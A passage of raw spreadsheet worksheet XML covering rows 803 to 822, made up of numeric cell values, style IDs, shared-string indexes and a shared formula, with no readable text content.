      <c r="E803" s="36" t="s">
        <v>30</v>
      </c>
      <c r="F803" s="14"/>
      <c r="G803" s="29">
        <v>1.0</v>
      </c>
      <c r="H803" s="29">
        <v>5536.0</v>
      </c>
      <c r="I803" s="29">
        <v>127881.0</v>
      </c>
      <c r="J803" s="15"/>
      <c r="K803" s="15"/>
      <c r="L803" s="15"/>
      <c r="M803" s="15"/>
      <c r="N803" s="36" t="s">
        <v>30</v>
      </c>
      <c r="O803" s="29">
        <v>1.0</v>
      </c>
      <c r="P803" s="29">
        <v>2.0</v>
      </c>
      <c r="Q803" s="15"/>
      <c r="R803" s="15"/>
      <c r="S803" s="15"/>
      <c r="T803" s="5" t="s">
        <v>37</v>
      </c>
      <c r="U803" s="5"/>
      <c r="V803" s="5"/>
      <c r="W803" s="47"/>
      <c r="X803" s="45"/>
      <c r="Y803" s="45"/>
      <c r="Z803" s="38" t="s">
        <v>3391</v>
      </c>
      <c r="AA803" s="39" t="s">
        <v>3392</v>
      </c>
      <c r="AB803" s="38" t="s">
        <v>3393</v>
      </c>
      <c r="AC803" s="40">
        <v>145574.0</v>
      </c>
      <c r="AD803" s="5"/>
      <c r="AE803" s="14"/>
      <c r="AF803" s="14"/>
    </row>
    <row r="804">
      <c r="A804" s="6">
        <f t="shared" si="1"/>
        <v>0.9243331245</v>
      </c>
      <c r="B804" s="29">
        <v>1.0</v>
      </c>
      <c r="C804" s="15"/>
      <c r="D804" s="14"/>
      <c r="E804" s="36" t="s">
        <v>30</v>
      </c>
      <c r="F804" s="14"/>
      <c r="G804" s="29">
        <v>1.0</v>
      </c>
      <c r="H804" s="29">
        <v>216.0</v>
      </c>
      <c r="I804" s="29">
        <v>82875.0</v>
      </c>
      <c r="J804" s="15"/>
      <c r="K804" s="15"/>
      <c r="L804" s="15"/>
      <c r="M804" s="14"/>
      <c r="N804" s="36" t="s">
        <v>30</v>
      </c>
      <c r="O804" s="29">
        <v>1.0</v>
      </c>
      <c r="P804" s="29">
        <v>2.0</v>
      </c>
      <c r="Q804" s="15"/>
      <c r="R804" s="15"/>
      <c r="S804" s="15"/>
      <c r="T804" s="5" t="s">
        <v>37</v>
      </c>
      <c r="U804" s="5"/>
      <c r="V804" s="5"/>
      <c r="W804" s="47"/>
      <c r="X804" s="45"/>
      <c r="Y804" s="45"/>
      <c r="Z804" s="38" t="s">
        <v>3394</v>
      </c>
      <c r="AA804" s="39" t="s">
        <v>3395</v>
      </c>
      <c r="AB804" s="38" t="s">
        <v>3396</v>
      </c>
      <c r="AC804" s="40">
        <v>160526.0</v>
      </c>
      <c r="AD804" s="5"/>
      <c r="AE804" s="14"/>
      <c r="AF804" s="14"/>
    </row>
    <row r="805">
      <c r="A805" s="6">
        <f t="shared" si="1"/>
        <v>0.9664092607</v>
      </c>
      <c r="B805" s="29">
        <v>1.0</v>
      </c>
      <c r="C805" s="15"/>
      <c r="D805" s="14"/>
      <c r="E805" s="36" t="s">
        <v>30</v>
      </c>
      <c r="F805" s="14"/>
      <c r="G805" s="29">
        <v>0.0</v>
      </c>
      <c r="H805" s="29">
        <v>105.0</v>
      </c>
      <c r="I805" s="29">
        <v>114132.0</v>
      </c>
      <c r="J805" s="15"/>
      <c r="K805" s="15"/>
      <c r="L805" s="15"/>
      <c r="M805" s="15"/>
      <c r="N805" s="36" t="s">
        <v>30</v>
      </c>
      <c r="O805" s="29">
        <v>0.0</v>
      </c>
      <c r="P805" s="29">
        <v>3.0</v>
      </c>
      <c r="Q805" s="15"/>
      <c r="R805" s="36" t="s">
        <v>30</v>
      </c>
      <c r="S805" s="15"/>
      <c r="T805" s="5" t="s">
        <v>70</v>
      </c>
      <c r="U805" s="5"/>
      <c r="V805" s="5"/>
      <c r="W805" s="47"/>
      <c r="X805" s="45"/>
      <c r="Y805" s="45"/>
      <c r="Z805" s="38" t="s">
        <v>3397</v>
      </c>
      <c r="AA805" s="39" t="s">
        <v>3398</v>
      </c>
      <c r="AB805" s="38" t="s">
        <v>3399</v>
      </c>
      <c r="AC805" s="40">
        <v>245836.0</v>
      </c>
      <c r="AD805" s="5"/>
      <c r="AE805" s="14"/>
      <c r="AF805" s="14"/>
    </row>
    <row r="806">
      <c r="A806" s="6">
        <f t="shared" si="1"/>
        <v>0.5769035393</v>
      </c>
      <c r="B806" s="29">
        <v>1.0</v>
      </c>
      <c r="C806" s="29">
        <v>152462.0</v>
      </c>
      <c r="D806" s="14"/>
      <c r="E806" s="36" t="s">
        <v>30</v>
      </c>
      <c r="F806" s="14"/>
      <c r="G806" s="29">
        <v>9.0</v>
      </c>
      <c r="H806" s="29">
        <v>1355.0</v>
      </c>
      <c r="I806" s="29">
        <v>140531.0</v>
      </c>
      <c r="J806" s="15"/>
      <c r="K806" s="29">
        <v>140531.0</v>
      </c>
      <c r="L806" s="15"/>
      <c r="M806" s="36" t="s">
        <v>30</v>
      </c>
      <c r="N806" s="36" t="s">
        <v>30</v>
      </c>
      <c r="O806" s="29">
        <v>2.0</v>
      </c>
      <c r="P806" s="29">
        <v>4.0</v>
      </c>
      <c r="Q806" s="15"/>
      <c r="R806" s="36" t="s">
        <v>30</v>
      </c>
      <c r="S806" s="15"/>
      <c r="T806" s="5" t="s">
        <v>37</v>
      </c>
      <c r="U806" s="5"/>
      <c r="V806" s="5"/>
      <c r="W806" s="47"/>
      <c r="X806" s="45"/>
      <c r="Y806" s="45"/>
      <c r="Z806" s="38" t="s">
        <v>3400</v>
      </c>
      <c r="AA806" s="39" t="s">
        <v>3401</v>
      </c>
      <c r="AB806" s="38" t="s">
        <v>488</v>
      </c>
      <c r="AC806" s="40">
        <v>152458.0</v>
      </c>
      <c r="AD806" s="5"/>
      <c r="AE806" s="14"/>
      <c r="AF806" s="14"/>
    </row>
    <row r="807">
      <c r="A807" s="6">
        <f t="shared" si="1"/>
        <v>0.2368656428</v>
      </c>
      <c r="B807" s="29">
        <v>1.0</v>
      </c>
      <c r="C807" s="15"/>
      <c r="D807" s="14"/>
      <c r="E807" s="36" t="s">
        <v>30</v>
      </c>
      <c r="F807" s="14"/>
      <c r="G807" s="29">
        <v>1.0</v>
      </c>
      <c r="H807" s="29">
        <v>121.0</v>
      </c>
      <c r="I807" s="29">
        <v>193131.0</v>
      </c>
      <c r="J807" s="15"/>
      <c r="K807" s="15"/>
      <c r="L807" s="15"/>
      <c r="M807" s="15"/>
      <c r="N807" s="36" t="s">
        <v>30</v>
      </c>
      <c r="O807" s="29">
        <v>1.0</v>
      </c>
      <c r="P807" s="29">
        <v>1.0</v>
      </c>
      <c r="Q807" s="15"/>
      <c r="R807" s="36" t="s">
        <v>30</v>
      </c>
      <c r="S807" s="15"/>
      <c r="T807" s="5" t="s">
        <v>70</v>
      </c>
      <c r="U807" s="5"/>
      <c r="V807" s="5"/>
      <c r="W807" s="47"/>
      <c r="X807" s="45"/>
      <c r="Y807" s="45"/>
      <c r="Z807" s="38" t="s">
        <v>3402</v>
      </c>
      <c r="AA807" s="39" t="s">
        <v>3403</v>
      </c>
      <c r="AB807" s="38" t="s">
        <v>3404</v>
      </c>
      <c r="AC807" s="40">
        <v>203471.0</v>
      </c>
      <c r="AD807" s="5"/>
      <c r="AE807" s="14"/>
      <c r="AF807" s="14"/>
    </row>
    <row r="808">
      <c r="A808" s="6">
        <f t="shared" si="1"/>
        <v>0.1836407907</v>
      </c>
      <c r="B808" s="29">
        <v>1.0</v>
      </c>
      <c r="C808" s="15"/>
      <c r="D808" s="14"/>
      <c r="E808" s="36" t="s">
        <v>30</v>
      </c>
      <c r="F808" s="14"/>
      <c r="G808" s="29">
        <v>1.0</v>
      </c>
      <c r="H808" s="29">
        <v>429.0</v>
      </c>
      <c r="I808" s="29">
        <v>34850.0</v>
      </c>
      <c r="J808" s="15"/>
      <c r="K808" s="29">
        <v>34850.0</v>
      </c>
      <c r="L808" s="15"/>
      <c r="M808" s="36" t="s">
        <v>30</v>
      </c>
      <c r="N808" s="36" t="s">
        <v>30</v>
      </c>
      <c r="O808" s="29">
        <v>0.0</v>
      </c>
      <c r="P808" s="29">
        <v>0.0</v>
      </c>
      <c r="Q808" s="15"/>
      <c r="R808" s="15"/>
      <c r="S808" s="15"/>
      <c r="T808" s="5" t="s">
        <v>37</v>
      </c>
      <c r="U808" s="5"/>
      <c r="V808" s="5"/>
      <c r="W808" s="47"/>
      <c r="X808" s="45"/>
      <c r="Y808" s="45"/>
      <c r="Z808" s="38" t="s">
        <v>3405</v>
      </c>
      <c r="AA808" s="39" t="s">
        <v>3406</v>
      </c>
      <c r="AB808" s="38" t="s">
        <v>3407</v>
      </c>
      <c r="AC808" s="40">
        <v>83300.0</v>
      </c>
      <c r="AD808" s="5"/>
      <c r="AE808" s="14"/>
      <c r="AF808" s="14"/>
    </row>
    <row r="809">
      <c r="A809" s="6">
        <f t="shared" si="1"/>
        <v>0.5747141769</v>
      </c>
      <c r="B809" s="29">
        <v>1.0</v>
      </c>
      <c r="C809" s="14"/>
      <c r="D809" s="14"/>
      <c r="E809" s="36" t="s">
        <v>30</v>
      </c>
      <c r="F809" s="14"/>
      <c r="G809" s="29">
        <v>3.0</v>
      </c>
      <c r="H809" s="29">
        <v>1156.0</v>
      </c>
      <c r="I809" s="29">
        <v>147828.0</v>
      </c>
      <c r="J809" s="15"/>
      <c r="K809" s="29">
        <v>105533.0</v>
      </c>
      <c r="L809" s="15"/>
      <c r="M809" s="36" t="s">
        <v>30</v>
      </c>
      <c r="N809" s="36" t="s">
        <v>30</v>
      </c>
      <c r="O809" s="29">
        <v>2.0</v>
      </c>
      <c r="P809" s="29">
        <v>4.0</v>
      </c>
      <c r="Q809" s="15"/>
      <c r="R809" s="15"/>
      <c r="S809" s="15"/>
      <c r="T809" s="5" t="s">
        <v>37</v>
      </c>
      <c r="U809" s="5"/>
      <c r="V809" s="5"/>
      <c r="W809" s="47"/>
      <c r="X809" s="45"/>
      <c r="Y809" s="45"/>
      <c r="Z809" s="38" t="s">
        <v>3408</v>
      </c>
      <c r="AA809" s="39" t="s">
        <v>3409</v>
      </c>
      <c r="AB809" s="38" t="s">
        <v>3410</v>
      </c>
      <c r="AC809" s="40">
        <v>159096.0</v>
      </c>
      <c r="AD809" s="5"/>
      <c r="AE809" s="14"/>
      <c r="AF809" s="14"/>
    </row>
    <row r="810">
      <c r="A810" s="6">
        <f t="shared" si="1"/>
        <v>0.5342916195</v>
      </c>
      <c r="B810" s="29">
        <v>1.0</v>
      </c>
      <c r="C810" s="15"/>
      <c r="D810" s="14"/>
      <c r="E810" s="36" t="s">
        <v>30</v>
      </c>
      <c r="F810" s="14"/>
      <c r="G810" s="29">
        <v>3.0</v>
      </c>
      <c r="H810" s="29">
        <v>1146.0</v>
      </c>
      <c r="I810" s="29">
        <v>141752.0</v>
      </c>
      <c r="J810" s="15"/>
      <c r="K810" s="29">
        <v>98538.0</v>
      </c>
      <c r="L810" s="15"/>
      <c r="M810" s="36" t="s">
        <v>30</v>
      </c>
      <c r="N810" s="36" t="s">
        <v>30</v>
      </c>
      <c r="O810" s="29">
        <v>3.0</v>
      </c>
      <c r="P810" s="29">
        <v>0.0</v>
      </c>
      <c r="Q810" s="15"/>
      <c r="R810" s="15"/>
      <c r="S810" s="15"/>
      <c r="T810" s="5" t="s">
        <v>37</v>
      </c>
      <c r="U810" s="5"/>
      <c r="V810" s="5"/>
      <c r="W810" s="47"/>
      <c r="X810" s="45"/>
      <c r="Y810" s="45"/>
      <c r="Z810" s="38" t="s">
        <v>3411</v>
      </c>
      <c r="AA810" s="39" t="s">
        <v>3412</v>
      </c>
      <c r="AB810" s="38" t="s">
        <v>3413</v>
      </c>
      <c r="AC810" s="40">
        <v>153647.0</v>
      </c>
      <c r="AD810" s="5"/>
      <c r="AE810" s="14"/>
      <c r="AF810" s="14"/>
    </row>
    <row r="811">
      <c r="A811" s="6">
        <f t="shared" si="1"/>
        <v>0.7716186145</v>
      </c>
      <c r="B811" s="29">
        <v>1.0</v>
      </c>
      <c r="C811" s="15"/>
      <c r="D811" s="14"/>
      <c r="E811" s="36" t="s">
        <v>30</v>
      </c>
      <c r="F811" s="14"/>
      <c r="G811" s="29">
        <v>0.0</v>
      </c>
      <c r="H811" s="29">
        <v>416.0</v>
      </c>
      <c r="I811" s="29">
        <v>84059.0</v>
      </c>
      <c r="J811" s="15"/>
      <c r="K811" s="15"/>
      <c r="L811" s="5" t="s">
        <v>1241</v>
      </c>
      <c r="M811" s="36" t="s">
        <v>30</v>
      </c>
      <c r="N811" s="36" t="s">
        <v>30</v>
      </c>
      <c r="O811" s="29">
        <v>0.0</v>
      </c>
      <c r="P811" s="29">
        <v>2.0</v>
      </c>
      <c r="Q811" s="15"/>
      <c r="R811" s="15"/>
      <c r="S811" s="15"/>
      <c r="T811" s="5" t="s">
        <v>37</v>
      </c>
      <c r="U811" s="5"/>
      <c r="V811" s="5"/>
      <c r="W811" s="47"/>
      <c r="X811" s="45"/>
      <c r="Y811" s="45"/>
      <c r="Z811" s="38" t="s">
        <v>3414</v>
      </c>
      <c r="AA811" s="39" t="s">
        <v>3415</v>
      </c>
      <c r="AB811" s="38" t="s">
        <v>3416</v>
      </c>
      <c r="AC811" s="40">
        <v>97506.0</v>
      </c>
      <c r="AD811" s="5"/>
      <c r="AE811" s="14"/>
      <c r="AF811" s="14"/>
    </row>
    <row r="812">
      <c r="A812" s="6">
        <f t="shared" si="1"/>
        <v>0.98919263</v>
      </c>
      <c r="B812" s="29">
        <v>1.0</v>
      </c>
      <c r="C812" s="15"/>
      <c r="D812" s="14"/>
      <c r="E812" s="36" t="s">
        <v>30</v>
      </c>
      <c r="F812" s="14"/>
      <c r="G812" s="29">
        <v>2.0</v>
      </c>
      <c r="H812" s="29">
        <v>181.0</v>
      </c>
      <c r="I812" s="29">
        <v>220873.0</v>
      </c>
      <c r="J812" s="15"/>
      <c r="K812" s="29">
        <v>61443.0</v>
      </c>
      <c r="L812" s="15"/>
      <c r="M812" s="36" t="s">
        <v>30</v>
      </c>
      <c r="N812" s="36" t="s">
        <v>30</v>
      </c>
      <c r="O812" s="29">
        <v>0.0</v>
      </c>
      <c r="P812" s="29">
        <v>3.0</v>
      </c>
      <c r="Q812" s="15"/>
      <c r="R812" s="15"/>
      <c r="S812" s="15"/>
      <c r="T812" s="5" t="s">
        <v>70</v>
      </c>
      <c r="U812" s="5"/>
      <c r="V812" s="5"/>
      <c r="W812" s="47"/>
      <c r="X812" s="45"/>
      <c r="Y812" s="45"/>
      <c r="Z812" s="38" t="s">
        <v>3417</v>
      </c>
      <c r="AA812" s="39" t="s">
        <v>3418</v>
      </c>
      <c r="AB812" s="38" t="s">
        <v>3419</v>
      </c>
      <c r="AC812" s="40">
        <v>220538.0</v>
      </c>
      <c r="AD812" s="5"/>
      <c r="AE812" s="14"/>
      <c r="AF812" s="14"/>
    </row>
    <row r="813">
      <c r="A813" s="6">
        <f t="shared" si="1"/>
        <v>0.3342588117</v>
      </c>
      <c r="B813" s="29">
        <v>1.0</v>
      </c>
      <c r="C813" s="15"/>
      <c r="D813" s="14"/>
      <c r="E813" s="36" t="s">
        <v>30</v>
      </c>
      <c r="F813" s="14"/>
      <c r="G813" s="29">
        <v>0.0</v>
      </c>
      <c r="H813" s="29">
        <v>546.0</v>
      </c>
      <c r="I813" s="29">
        <v>153227.0</v>
      </c>
      <c r="J813" s="15"/>
      <c r="K813" s="29">
        <v>153227.0</v>
      </c>
      <c r="L813" s="15"/>
      <c r="M813" s="36" t="s">
        <v>30</v>
      </c>
      <c r="N813" s="36" t="s">
        <v>30</v>
      </c>
      <c r="O813" s="29">
        <v>3.0</v>
      </c>
      <c r="P813" s="29">
        <v>5.0</v>
      </c>
      <c r="Q813" s="15"/>
      <c r="R813" s="15"/>
      <c r="S813" s="15"/>
      <c r="T813" s="5" t="s">
        <v>37</v>
      </c>
      <c r="U813" s="5"/>
      <c r="V813" s="5"/>
      <c r="W813" s="47"/>
      <c r="X813" s="45"/>
      <c r="Y813" s="45"/>
      <c r="Z813" s="38" t="s">
        <v>3420</v>
      </c>
      <c r="AA813" s="39" t="s">
        <v>3421</v>
      </c>
      <c r="AB813" s="38" t="s">
        <v>488</v>
      </c>
      <c r="AC813" s="40">
        <v>165076.0</v>
      </c>
      <c r="AD813" s="5"/>
      <c r="AE813" s="14"/>
      <c r="AF813" s="14"/>
    </row>
    <row r="814">
      <c r="A814" s="6">
        <f t="shared" si="1"/>
        <v>0.6437590503</v>
      </c>
      <c r="B814" s="29">
        <v>1.0</v>
      </c>
      <c r="C814" s="29">
        <v>218277.0</v>
      </c>
      <c r="D814" s="14"/>
      <c r="E814" s="36" t="s">
        <v>30</v>
      </c>
      <c r="F814" s="14"/>
      <c r="G814" s="29">
        <v>0.0</v>
      </c>
      <c r="H814" s="29">
        <v>141.0</v>
      </c>
      <c r="I814" s="29">
        <v>110133.0</v>
      </c>
      <c r="J814" s="15"/>
      <c r="K814" s="15"/>
      <c r="L814" s="15"/>
      <c r="M814" s="14"/>
      <c r="N814" s="36" t="s">
        <v>30</v>
      </c>
      <c r="O814" s="29">
        <v>2.0</v>
      </c>
      <c r="P814" s="29">
        <v>2.0</v>
      </c>
      <c r="Q814" s="15"/>
      <c r="R814" s="15"/>
      <c r="S814" s="15"/>
      <c r="T814" s="5" t="s">
        <v>70</v>
      </c>
      <c r="U814" s="5"/>
      <c r="V814" s="5"/>
      <c r="W814" s="47"/>
      <c r="X814" s="45"/>
      <c r="Y814" s="45"/>
      <c r="Z814" s="38" t="s">
        <v>3422</v>
      </c>
      <c r="AA814" s="39" t="s">
        <v>3423</v>
      </c>
      <c r="AB814" s="38" t="s">
        <v>3424</v>
      </c>
      <c r="AC814" s="40">
        <v>218274.0</v>
      </c>
      <c r="AD814" s="5"/>
      <c r="AE814" s="14"/>
      <c r="AF814" s="14"/>
    </row>
    <row r="815">
      <c r="A815" s="6">
        <f t="shared" si="1"/>
        <v>0.4935883726</v>
      </c>
      <c r="B815" s="29">
        <v>1.0</v>
      </c>
      <c r="C815" s="15"/>
      <c r="D815" s="14"/>
      <c r="E815" s="36" t="s">
        <v>30</v>
      </c>
      <c r="F815" s="14"/>
      <c r="G815" s="29">
        <v>1.0</v>
      </c>
      <c r="H815" s="29">
        <v>97.0</v>
      </c>
      <c r="I815" s="29">
        <v>286160.0</v>
      </c>
      <c r="J815" s="15"/>
      <c r="K815" s="15"/>
      <c r="L815" s="15"/>
      <c r="M815" s="15"/>
      <c r="N815" s="36" t="s">
        <v>30</v>
      </c>
      <c r="O815" s="29">
        <v>1.0</v>
      </c>
      <c r="P815" s="29">
        <v>0.0</v>
      </c>
      <c r="Q815" s="15"/>
      <c r="R815" s="15"/>
      <c r="S815" s="15"/>
      <c r="T815" s="5" t="s">
        <v>70</v>
      </c>
      <c r="U815" s="5"/>
      <c r="V815" s="5"/>
      <c r="W815" s="47"/>
      <c r="X815" s="45"/>
      <c r="Y815" s="45"/>
      <c r="Z815" s="38" t="s">
        <v>3425</v>
      </c>
      <c r="AA815" s="39" t="s">
        <v>3426</v>
      </c>
      <c r="AB815" s="38" t="s">
        <v>1406</v>
      </c>
      <c r="AC815" s="40">
        <v>266718.0</v>
      </c>
      <c r="AD815" s="5"/>
      <c r="AE815" s="14"/>
      <c r="AF815" s="14"/>
    </row>
    <row r="816">
      <c r="A816" s="6">
        <f t="shared" si="1"/>
        <v>0.8809690614</v>
      </c>
      <c r="B816" s="29">
        <v>1.0</v>
      </c>
      <c r="C816" s="15"/>
      <c r="D816" s="14"/>
      <c r="E816" s="36" t="s">
        <v>30</v>
      </c>
      <c r="F816" s="14"/>
      <c r="G816" s="29">
        <v>1.0</v>
      </c>
      <c r="H816" s="29">
        <v>108.0</v>
      </c>
      <c r="I816" s="29">
        <v>184967.0</v>
      </c>
      <c r="J816" s="15"/>
      <c r="K816" s="15"/>
      <c r="L816" s="15"/>
      <c r="M816" s="14"/>
      <c r="N816" s="36" t="s">
        <v>30</v>
      </c>
      <c r="O816" s="29">
        <v>0.0</v>
      </c>
      <c r="P816" s="29">
        <v>4.0</v>
      </c>
      <c r="Q816" s="15"/>
      <c r="R816" s="36" t="s">
        <v>30</v>
      </c>
      <c r="S816" s="15"/>
      <c r="T816" s="5" t="s">
        <v>70</v>
      </c>
      <c r="U816" s="5"/>
      <c r="V816" s="5"/>
      <c r="W816" s="47"/>
      <c r="X816" s="45"/>
      <c r="Y816" s="45"/>
      <c r="Z816" s="38" t="s">
        <v>3427</v>
      </c>
      <c r="AA816" s="39" t="s">
        <v>3428</v>
      </c>
      <c r="AB816" s="38" t="s">
        <v>3429</v>
      </c>
      <c r="AC816" s="40">
        <v>201359.0</v>
      </c>
      <c r="AD816" s="5"/>
      <c r="AE816" s="14"/>
      <c r="AF816" s="14"/>
    </row>
    <row r="817">
      <c r="A817" s="6">
        <f t="shared" si="1"/>
        <v>0.06552247221</v>
      </c>
      <c r="B817" s="29">
        <v>1.0</v>
      </c>
      <c r="C817" s="29">
        <v>62762.0</v>
      </c>
      <c r="D817" s="14"/>
      <c r="E817" s="36" t="s">
        <v>30</v>
      </c>
      <c r="F817" s="14"/>
      <c r="G817" s="29">
        <v>13.0</v>
      </c>
      <c r="H817" s="29">
        <v>2513.0</v>
      </c>
      <c r="I817" s="29">
        <v>971.0</v>
      </c>
      <c r="J817" s="15"/>
      <c r="K817" s="29">
        <v>-1.0</v>
      </c>
      <c r="L817" s="15"/>
      <c r="M817" s="36" t="s">
        <v>30</v>
      </c>
      <c r="N817" s="36" t="s">
        <v>30</v>
      </c>
      <c r="O817" s="29">
        <v>4.0</v>
      </c>
      <c r="P817" s="29">
        <v>0.0</v>
      </c>
      <c r="Q817" s="15"/>
      <c r="R817" s="15"/>
      <c r="S817" s="15"/>
      <c r="T817" s="5" t="s">
        <v>37</v>
      </c>
      <c r="U817" s="5"/>
      <c r="V817" s="5"/>
      <c r="W817" s="47"/>
      <c r="X817" s="45"/>
      <c r="Y817" s="45"/>
      <c r="Z817" s="38" t="s">
        <v>3430</v>
      </c>
      <c r="AA817" s="39" t="s">
        <v>3431</v>
      </c>
      <c r="AB817" s="38" t="s">
        <v>3432</v>
      </c>
      <c r="AC817" s="40">
        <v>62212.0</v>
      </c>
      <c r="AD817" s="5"/>
      <c r="AE817" s="14"/>
      <c r="AF817" s="14"/>
    </row>
    <row r="818">
      <c r="A818" s="6">
        <f t="shared" si="1"/>
        <v>0.5790611253</v>
      </c>
      <c r="B818" s="29">
        <v>1.0</v>
      </c>
      <c r="C818" s="14"/>
      <c r="D818" s="14"/>
      <c r="E818" s="36" t="s">
        <v>30</v>
      </c>
      <c r="F818" s="14"/>
      <c r="G818" s="29">
        <v>2.0</v>
      </c>
      <c r="H818" s="29">
        <v>669.0</v>
      </c>
      <c r="I818" s="29">
        <v>174763.0</v>
      </c>
      <c r="J818" s="15"/>
      <c r="K818" s="29">
        <v>76718.0</v>
      </c>
      <c r="L818" s="15"/>
      <c r="M818" s="36" t="s">
        <v>30</v>
      </c>
      <c r="N818" s="36" t="s">
        <v>30</v>
      </c>
      <c r="O818" s="29">
        <v>1.0</v>
      </c>
      <c r="P818" s="29">
        <v>3.0</v>
      </c>
      <c r="Q818" s="15"/>
      <c r="R818" s="15"/>
      <c r="S818" s="15"/>
      <c r="T818" s="5" t="s">
        <v>37</v>
      </c>
      <c r="U818" s="5"/>
      <c r="V818" s="5"/>
      <c r="W818" s="47"/>
      <c r="X818" s="45"/>
      <c r="Y818" s="45"/>
      <c r="Z818" s="38" t="s">
        <v>3433</v>
      </c>
      <c r="AA818" s="39" t="s">
        <v>3434</v>
      </c>
      <c r="AB818" s="38" t="s">
        <v>1562</v>
      </c>
      <c r="AC818" s="40">
        <v>182916.0</v>
      </c>
      <c r="AD818" s="5"/>
      <c r="AE818" s="14"/>
      <c r="AF818" s="14"/>
    </row>
    <row r="819">
      <c r="A819" s="6">
        <f t="shared" si="1"/>
        <v>0.7986915377</v>
      </c>
      <c r="B819" s="29">
        <v>1.0</v>
      </c>
      <c r="C819" s="15"/>
      <c r="D819" s="14"/>
      <c r="E819" s="36" t="s">
        <v>30</v>
      </c>
      <c r="F819" s="14"/>
      <c r="G819" s="29">
        <v>0.0</v>
      </c>
      <c r="H819" s="29">
        <v>1700.0</v>
      </c>
      <c r="I819" s="29">
        <v>971.0</v>
      </c>
      <c r="J819" s="15"/>
      <c r="K819" s="15"/>
      <c r="L819" s="15"/>
      <c r="M819" s="14"/>
      <c r="N819" s="36" t="s">
        <v>30</v>
      </c>
      <c r="O819" s="29">
        <v>2.0</v>
      </c>
      <c r="P819" s="29">
        <v>0.0</v>
      </c>
      <c r="Q819" s="15"/>
      <c r="R819" s="36" t="s">
        <v>30</v>
      </c>
      <c r="S819" s="15"/>
      <c r="T819" s="5" t="s">
        <v>37</v>
      </c>
      <c r="U819" s="5"/>
      <c r="V819" s="5"/>
      <c r="W819" s="47"/>
      <c r="X819" s="45"/>
      <c r="Y819" s="45"/>
      <c r="Z819" s="38" t="s">
        <v>3435</v>
      </c>
      <c r="AA819" s="39" t="s">
        <v>3436</v>
      </c>
      <c r="AB819" s="38" t="s">
        <v>3437</v>
      </c>
      <c r="AC819" s="40">
        <v>44122.0</v>
      </c>
      <c r="AD819" s="5"/>
      <c r="AE819" s="14"/>
      <c r="AF819" s="14"/>
    </row>
    <row r="820">
      <c r="A820" s="6">
        <f t="shared" si="1"/>
        <v>0.443357239</v>
      </c>
      <c r="B820" s="29">
        <v>1.0</v>
      </c>
      <c r="C820" s="14"/>
      <c r="D820" s="14"/>
      <c r="E820" s="36" t="s">
        <v>30</v>
      </c>
      <c r="F820" s="14"/>
      <c r="G820" s="29">
        <v>0.0</v>
      </c>
      <c r="H820" s="29">
        <v>2186.0</v>
      </c>
      <c r="I820" s="29">
        <v>61423.0</v>
      </c>
      <c r="J820" s="15"/>
      <c r="K820" s="15"/>
      <c r="L820" s="15"/>
      <c r="M820" s="14"/>
      <c r="N820" s="36" t="s">
        <v>30</v>
      </c>
      <c r="O820" s="29">
        <v>1.0</v>
      </c>
      <c r="P820" s="29">
        <v>0.0</v>
      </c>
      <c r="Q820" s="15"/>
      <c r="R820" s="36" t="s">
        <v>30</v>
      </c>
      <c r="S820" s="15"/>
      <c r="T820" s="5" t="s">
        <v>37</v>
      </c>
      <c r="U820" s="5"/>
      <c r="V820" s="5"/>
      <c r="W820" s="47"/>
      <c r="X820" s="45"/>
      <c r="Y820" s="45"/>
      <c r="Z820" s="38" t="s">
        <v>3438</v>
      </c>
      <c r="AA820" s="39" t="s">
        <v>3439</v>
      </c>
      <c r="AB820" s="38" t="s">
        <v>3440</v>
      </c>
      <c r="AC820" s="40">
        <v>73652.0</v>
      </c>
      <c r="AD820" s="5"/>
      <c r="AE820" s="14"/>
      <c r="AF820" s="14"/>
    </row>
    <row r="821">
      <c r="A821" s="6">
        <f t="shared" si="1"/>
        <v>0.3607082079</v>
      </c>
      <c r="B821" s="29">
        <v>1.0</v>
      </c>
      <c r="C821" s="15"/>
      <c r="D821" s="14"/>
      <c r="E821" s="36" t="s">
        <v>30</v>
      </c>
      <c r="F821" s="14"/>
      <c r="G821" s="29">
        <v>1.0</v>
      </c>
      <c r="H821" s="29">
        <v>545.0</v>
      </c>
      <c r="I821" s="29">
        <v>72260.0</v>
      </c>
      <c r="J821" s="15"/>
      <c r="K821" s="15"/>
      <c r="L821" s="15"/>
      <c r="M821" s="15"/>
      <c r="N821" s="36" t="s">
        <v>30</v>
      </c>
      <c r="O821" s="29">
        <v>1.0</v>
      </c>
      <c r="P821" s="29">
        <v>1.0</v>
      </c>
      <c r="Q821" s="15"/>
      <c r="R821" s="36" t="s">
        <v>30</v>
      </c>
      <c r="S821" s="15"/>
      <c r="T821" s="5" t="s">
        <v>37</v>
      </c>
      <c r="U821" s="5"/>
      <c r="V821" s="5"/>
      <c r="W821" s="47"/>
      <c r="X821" s="45"/>
      <c r="Y821" s="45"/>
      <c r="Z821" s="38" t="s">
        <v>3441</v>
      </c>
      <c r="AA821" s="39" t="s">
        <v>3442</v>
      </c>
      <c r="AB821" s="38" t="s">
        <v>2616</v>
      </c>
      <c r="AC821" s="40">
        <v>85779.0</v>
      </c>
      <c r="AD821" s="5"/>
      <c r="AE821" s="14"/>
      <c r="AF821" s="14"/>
    </row>
    <row r="822">
      <c r="A822" s="6">
        <f t="shared" si="1"/>
        <v>0.569891125</v>
      </c>
      <c r="B822" s="29">
        <v>1.0</v>
      </c>
      <c r="C822" s="29">
        <v>243456.0</v>
      </c>
      <c r="D822" s="14"/>
      <c r="E822" s="36" t="s">
        <v>30</v>
      </c>
      <c r="F822" s="14"/>
      <c r="G822" s="29">
        <v>2.0</v>
      </c>
      <c r="H822" s="29">
        <v>205.0</v>
      </c>
      <c r="I822" s="29">
        <v>249257.0</v>
      </c>
      <c r="J822" s="15"/>
      <c r="K822" s="29">
        <v>249257.0</v>
      </c>
      <c r="L822" s="15"/>
      <c r="M822" s="36" t="s">
        <v>30</v>
      </c>
      <c r="N822" s="36" t="s">
        <v>30</v>
      </c>
      <c r="O822" s="29">
        <v>3.0</v>
      </c>
      <c r="P822" s="29">
        <v>3.0</v>
      </c>
      <c r="Q822" s="15"/>
      <c r="R822" s="15"/>
      <c r="S822" s="15"/>
      <c r="T822" s="5" t="s">
        <v>70</v>
      </c>
      <c r="U822" s="5"/>
      <c r="V822" s="5"/>
      <c r="W822" s="47"/>
      <c r="X822" s="45"/>
      <c r="Y822" s="45"/>
      <c r="Z822" s="38" t="s">
        <v>3443</v>
      </c>
      <c r="AA822" s="39" t="s">
        <v>3444</v>
      </c>
      <c r="AB822" s="38" t="s">
        <v>3445</v>
      </c>
      <c r="AC822" s="40">
        <v>243453.0</v>
      </c>
      <c r="AD822" s="5"/>
